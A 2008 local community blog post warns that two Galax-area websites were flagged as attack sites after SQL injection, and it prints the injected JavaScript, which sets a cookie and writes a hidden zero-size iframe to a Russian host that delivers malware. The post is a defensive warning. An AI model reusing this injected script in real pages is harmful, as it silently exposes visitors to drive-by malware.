Home

LSNet

  • Calendar
  • Downtown Galax
  • Drupal@LSNet
  • GMail
  • Weather
 

Site navigation

  • Blogs
  • Books
  • Commentary
  • Contact
  • DVDs
  • Education
  • Entertainment
  • Events
  • Food
  • Forums
  • GMail
  • Hardware
  • Health
  • Image galleries
  • Jobs
  • Local
  • Movies
  • Music
  • News
  • Paypal
  • People
  • Products
  • Projects
  • School Closings
  • Software
  • Tags
  • Tech Support
  • Travel
  • Weather

User login

  • Create new account
  • Request new password

Daily Mandala

The Daily Mandala

Starbuck

  • It’s the Spirit that Heals
  • The times are Changing
  • Is there a New Consciousness Emerging?
more

Reported Attack Site!

Submitted by tarvid on Sat, 2008/07/19 - 08:37.
  • Drupal
  • Internet
  • Software
  • WWW

Two local websites - twincountyunitedway.com and ingalax.net - have been identified by Google as attack sites which download malicious software to your computer. The footer of both websites includes the text "Website developed and hosted by Professional Networks, Inc. and Wiredog Internet".  Both of these websites were constructed using Adobe Dreamweaver. Adobe posted an advisory about SQL Injection vulnerabilities on May 9, 2006 and offered an update to the server software.

The malicious software is downloaded when you click on links which have been "injected" into the server database by third parties exploiting non-updated servers. One example of a link from the twincountyunitedway site and the delivered code is:

http://www.movaddw.com/ngg.js
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("dssndd=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "dssndd=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://bnrc.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}

This in turn redirects to a Russian site - http://bnrc.ru/cgi-bin/index.cgi?ad which will take you to http://www.msn.com/. Seems harmless but your machine is now "owned" by a consortium of cyber-criminals.

If you do not get the warning, you are probably using a web browser which does not check urls against a database of malicious sites in which case you should download and install Firefox. If you are the owner of a website, you should find out if the server software has been properly updated.

The security advantage of open source browsers and servers lies more in the support community than the quality of code. Tens of thousands of people are actively engaged in maintaining and vetting open source software, millions have a vested interest in its security and safety.

 

 

Bookmark/Search this post with:
  • Delicious
  • Digg
  • StumbleUpon
  • Propeller
  • Reddit
  • Magnoliacom
  • Newsvine
  • Furl
  • Facebook
  • Google
  • Yahoo
  • Login or register to post comments
  • Printer-friendly version
877-465-7638 - 115 1/2 W Grayson St Galax VA 24333
RoopleTheme